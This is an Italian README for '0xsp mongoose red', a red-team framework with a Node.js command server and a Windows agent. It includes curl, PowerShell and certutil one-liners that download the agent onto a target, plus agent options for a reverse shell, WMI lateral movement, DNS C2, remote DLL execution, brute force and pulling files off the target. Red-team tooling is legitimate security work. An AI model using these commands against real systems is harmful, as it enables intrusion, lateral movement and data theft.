
un framework unico per la simulazione di cybersicurezza e operazioni di red team, auditing di Windows per vulnerabilità più recenti, configurazioni errate e attacchi di escalation dei privilegi, replica delle tattiche e delle tecniche di un avversario avanzato in una rete.
Supporta il progetto per lo sviluppo continuo (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)
Versione corrente 2.2.0
La versione 0xsp mongoose red è fornita per assistere le vostre esigenze durante la simulazione di sicurezza informatica; utilizzando questa versione sarete in grado di eseguire un audit di un sistema operativo Windows target per vulnerabilità di sistema, configurazioni errate e attacchi di escalation dei privilegi, e replicare le tattiche e le tecniche di un avversario avanzato in una rete.
Con il supporto Node.js per l'API dell'applicazione web, l'installazione e la personalizzazione diventano molto più rapide; l'agente sensore Windows comunicherà con l'API dell'applicazione per trasferire i risultati e ricevere comandi come tecnica bidirezionale.
l'agente è in grado di identificare e rilevare exploit di Windows utilizzando i moduli windows update api e exploit database definitions; la nuova versione rileverà anche le seguenti vulnerabilità.
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose
cd 0xsp-mongoose/
npm install
node index.js
credenziali di accesso predefinite:
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP
#example 1
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe
-s --recupera i servizi Windows e i driver installati.
-u --recupera informazioni su utenti, gruppi, ruoli.
-c --cerca nei driver connessi file di configurazione sensibili per estensione.
-n --recupera informazioni di rete, interfacce di rete, dettagli di connessione.
-w --enumera directory scrivibili, controllo permessi di accesso, permessi modificati.
-i --enumera informazioni di sistema Windows, sessioni, controllo Always Elevated.
-l --cerca in qualsiasi file una stringa specifica, es: agent.exe -l c:\ password *.config.
-o --specifica l'indirizzo host dell'applicazione Node.js, puoi usare anche srvhost
-p --enumera software installati, processi in esecuzione, attività.
-e --strumento di ispezione del kernel, aiuterà a cercare nei database degli strumenti le vulnerabilità del kernel Windows.
-x --password per autorizzare la connessione con l'applicazione Node.js.
-d --scarica file direttamente nella macchina target.
-t --carica file dalla macchina target nell'applicazione Node.js.
-spooler --scansiona un singolo host o una lista di host per il possibile CVE-2021-1675 (es. -spooler -srvhost o -spooler -hosts )
-m --esegue tutti i tipi di scansione conosciuti insieme.
[!] SEZIONE TATTICHE RED TEAMING
-r --avvia una reverse shell con un account specifico.
-lr --tecnica di movimento laterale usando WMI (es. -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --scoperta della rete ed enumerazione delle condivisioni
-dns --stabilisce shell interattiva DNS C2C
-cmd --trasferisce comandi tramite HTTP Shell
-interactive --avvia la modalità interattiva (es: caricamento plugin, ecc.)
-username --autenticazione identità per moduli di attacco specifici.
-password --autenticazione identità per moduli di attacco specifici.
-host --identifica l'host remoto su cui condurre un attacco.
-srvhost --imposta l'rhost dell'applicazione Node.js.
-bf --modulo di brute force per utenti locali / di dominio
-import --importa ed esegue file DLL localmente
-remote --importa ed esegue file DLL da un host remoto
https://0xsp.com/security%20dev/0xsp-mongoose-red
Assicurati di iscriverti al seguente canale per essere avvisato quando vengono pubblicati nuovi tutorial e trucchi per 0xsp https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg